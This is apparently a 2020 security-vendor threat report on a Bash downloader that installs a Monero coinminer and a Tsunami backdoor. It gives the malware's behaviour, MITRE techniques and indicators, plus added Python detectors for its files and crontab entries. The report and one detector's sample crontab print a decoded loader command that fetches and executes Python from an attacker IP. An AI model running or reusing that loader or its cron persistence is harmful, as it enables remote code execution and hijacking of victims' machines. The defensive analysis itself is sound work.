Coinminer Downloader

Threat Report

Date: 08/09/2020

Hussain Kathawala

Coinminer Downloader is a shell agent that downloads a BTC coinminer, which belongs to the category of malware that exploits system resources. It gives the attacker access to the victim's machine in order to use the computer's resources to mine digital currency.

OVERVIEW

• The malware of this Coinminer Downloader was intercepted by the Subex Honeypot on 29th August 2020.
• The downloader script is written in Bash.
• The Coinminer has various variants in the form of executables. It may be distributed through malicious email attachments, self-executing scripts, malicious software, etc.
• Through the Coinminer, the attacker uses the victim system's resources, such as the Graphics Processing Unit, to generate digital currency without the system owner's consent, leading to a decrease in system performance.

PAYLOAD AND INFECTION

Starting with "ulimit", the bot raises the maximum number of processes allowed for a single user. Next it multiplies the actual core count of the victim system's processor by 3 and assigns the value to the kernel parameter "vm.nr_hugepages" using the "sysctl" command; after that it kills all the services running on the list of ports shown in figure 1.

Figure 1

It stores the victim's IP address range in the "range" variable, obtained by filtering the output of the "ifconfig" command.

After obtaining the victim's IP address range, the bot sends a ping to the "pool.supportxmr.com" server. If the check returns "1", it indicates that the server is up and the bot proceeds with further execution.

Figure 2

Then, it sets up the payload. While analysing the payload, a base64 encoded string is obtained; decoding it yields the python command shown below, which reads and executes the python file hosted at the IP "205.185.113.151".

python -c 'import urllib;exec(urllib.urlopen("http://205.185.113.151/d.py").read())'

Figure 3

Next, the bot changes the attributes of the crontab files with the help of the "chattr" command and adds entries for the same payload, to be executed at different intervals, to different crontab files as shown in the figure below.

Figure 4

The bot then defines a "DIR" variable holding the path of the "tmp" directory, moves to the location "/tmp/.sh" and checks for the existence of the file "x86_64". If it is present, it calculates the MD5 of the file and compares it with the MD5 of the Coinminer ELF malware, "cd7ca50a01fc9c6e8fdc8c3d5e6100f0". If the MD5 matches, it prints the message "x86_64 ok"; otherwise it moves on to the "download()" function.

Figure 5

In the "download()" function, the bot again checks for the existence of the file "x86_643" in the "/tmp" directory with the Coinminer MD5 "cd7ca50a01fc9c6e8fdc8c3d5e6100f0". If the file is present it makes a copy of "x86_643" under the name "x86_64"; if it is not present, it executes the "download2()" function. "download2()" first checks the architecture and downloads the file matching that architecture to the same location, i.e. the "tmp" directory. After downloading the malware file it verifies the MD5 checksum as shown in the figure.

Figure 6
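The staging behaviour described above (the hidden "/tmp/.sh" directory, the "x86_64"/"x86_643" filenames and the MD5 values the report lists) can be turned into a host-side check. The following is an added example, not code from the report or from the malware; the directory layout it builds is constructed and uses dummy file contents, so only the path rule fires in the demo.

```python
import hashlib
import os
import tempfile

# MD5 values from the report's IoC list. The first two are attributed in the text
# to the Coinminer ELF and the Backdoor Tsunami binary; the third is unattributed.
KNOWN_BAD_MD5 = {
    "cd7ca50a01fc9c6e8fdc8c3d5e6100f0": "Coinminer ELF",
    "c4d44eed4916675dd408ff0b3562fb1f": "Backdoor Tsunami",
    "e2c6e2b1a5625bfc5c7d018029f022aa": "unattributed IoC from the report",
}
# Filenames and hidden directory the downloader stages the binary under.
STAGING_NAMES = {"x86_64", "x86_643"}
STAGING_DIR = ".sh"

def md5_of(path, chunk=1 << 16):
    """Stream a file through MD5 so large binaries do not need to fit in RAM."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def scan_dir(root):
    """Walk root (e.g. /tmp); return [(path, reason)] for indicator matches."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = md5_of(path)
            except OSError:
                continue  # unreadable or vanished (e.g. a socket in /tmp)
            if digest in KNOWN_BAD_MD5:
                findings.append((path, "md5 match: " + KNOWN_BAD_MD5[digest]))
            elif name in STAGING_NAMES and os.path.basename(dirpath) == STAGING_DIR:
                findings.append((path, "staging name under hidden " + STAGING_DIR))
    return findings

def demo():
    """Constructed layout mirroring the report (/tmp/.sh/x86_64 plus a benign
    file). The binary is dummy bytes, so only the path rule fires here."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, STAGING_DIR))
    with open(os.path.join(root, STAGING_DIR, "x86_64"), "wb") as f:
        f.write(b"not a real ELF")
    with open(os.path.join(root, "notes.txt"), "w") as f:
        f.write("benign")
    return scan_dir(root)
```

Running scan_dir("/tmp") on a live host reports both hash matches and the staging path, whichever is present.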

Then the bot changes the mode of the malware file, giving it execute permission as shown in the figure.

Figure 7

After the execution of the Coinminer, the bot checks with netstat for a connection to the IP "104.244.75.25". If the connection has been established, the bot downloads an additional malware file (selected by architecture) and calculates its MD5. This additional file belongs to the "Backdoor Tsunami" malware, with MD5 "c4d44eed4916675dd408ff0b3562fb1f"; the bot gives it execute permission and runs it, as shown in the figure.

Figure 8

After running the bash script from the terminal, the output is as shown below. It shows all the processes executed by the bot that we discussed earlier.

Figure 9

As can also be seen, a crontab entry for the same payload is created and set to execute every minute.

Figure 10
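The persistence described in the crontab paragraphs above (the same base64 encoded python loader registered in several crontab files, including an every-minute entry) is easy to spot once the blob is decoded. The following is an added example, not code from the report or from the malware: it decodes base64 runs found in crontab lines and flags those that contain a download-and-exec loader or one of the report's indicators. The sample crontab is constructed and embeds the loader command quoted in the report.

```python
import base64
import re

# Indicators quoted in the report (payload host, check-in/C&C IPs, mining pool).
KNOWN_BAD_HOSTS = {"205.185.113.151", "104.244.75.25", "209.141.61.233",
                   "209.151.39.17", "pool.supportxmr.com"}
# A base64 run long enough to hold a command; short tokens are ignored.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Fragments that mark a download-and-exec loader once the blob is decoded.
LOADER_MARKERS = ("urlopen(", "exec(", "urllib")

def decode_blobs(line):
    """Return every base64 run in a cron line that decodes to printable text."""
    found = []
    for m in B64_RUN.finditer(line):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or decodes to binary: skip it
        if text.isprintable():
            found.append(text)
    return found

def inspect_cron_line(line):
    """Return (is_suspicious, decoded_text) for one crontab line."""
    line = line.strip()
    if not line or line.startswith("#"):
        return False, ""
    for text in decode_blobs(line):
        markers = [m for m in LOADER_MARKERS if m in text]
        hosts = [h for h in KNOWN_BAD_HOSTS if h in text]
        if len(markers) >= 2 or hosts:
            return True, text
    # An un-encoded reference to a known host is also worth flagging.
    return any(h in line for h in KNOWN_BAD_HOSTS), ""

# Constructed crontab: entry 1 wraps the loader quoted in the report in base64
# and runs it every minute, as Figure 10 describes; the other two are benign.
LOADER = ("python -c 'import urllib;exec(urllib.urlopen("
          "\"http://205.185.113.151/d.py\").read())'")
SAMPLE_CRONTAB = [
    "* * * * * echo " + base64.b64encode(LOADER.encode()).decode() + " | base64 -d | sh",
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "*/5 * * * * /usr/local/bin/backup.sh",
]

if __name__ == "__main__":
    for raw in SAMPLE_CRONTAB:
        print(inspect_cron_line(raw), raw[:60])
```

On a real host, feed it the lines of /etc/crontab, /etc/cron.d/* and each user's crontab -l output; a crontab file that "chattr" has made immutable is itself a further indicator worth checking with lsattr.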

NETWORK TRAFFIC ANALYSIS

While analysing the network traffic, the Coinminer ELF is seen being downloaded from the IP "209.141.61.233" as shown in the figure below.

Figure 11

The Coinminer communicates with the C&C server at IP "209.151.39.17" as shown in the figure.

Figure 12

MITRE ATT&CK TECHNIQUES USED

Technique ID    Technique
T1059.004       Command and Scripting Interpreter: Shell
T1053.003       Scheduled Task/Job:
T1083           File and Directory Discovery
T1132.001       Data Encoding: Standard Encoding
T1496           Resource Hijacking

IOCs

MD5:
e2c6e2b1a5625bfc5c7d018029f022aa
cd7ca50a01fc9c6e8fdc8c3d5e6100f0
c4d44eed4916675dd408ff0b3562fb1f

IP addresses:
205.185.113.151
104.244.75.25
209.141.61.233
209.151.39.17

Domain:
pool.supportxmr.com

SUBEXSECURE PROTECTION

SubexSecure detects the sample as “SS_Gen_Coinminer_Downloader_Shell_A”.

OUR HONEYPOT NETWORK

This report has been prepared from threat intelligence gathered by our honeypot network that is today operational in 62 cities across the world. These cities have at least one of these attributes:

▪ Are landing centers for submarine cables
▪ Are internet traffic hotspots
▪ House multiple IoT projects with a high number of connected endpoints
▪ House multiple connected critical infrastructure projects
▪ Have academic and research centers focusing on IoT
▪ Have the potential to host multiple IoT projects across domains in the future

Over 3.5 million attacks a day registered across this network of individual honeypots are studied, analyzed, categorized and marked according to a threat rank index, a priority assessment framework that we have developed within Subex. The network includes over 4000 physical and virtual devices covering over 400 device architectures and varied connectivity flavors globally. Devices are grouped based on the sectors they belong to for purposes of understanding sectoral attacks. Thus, a layered flow of threat intelligence is made possible.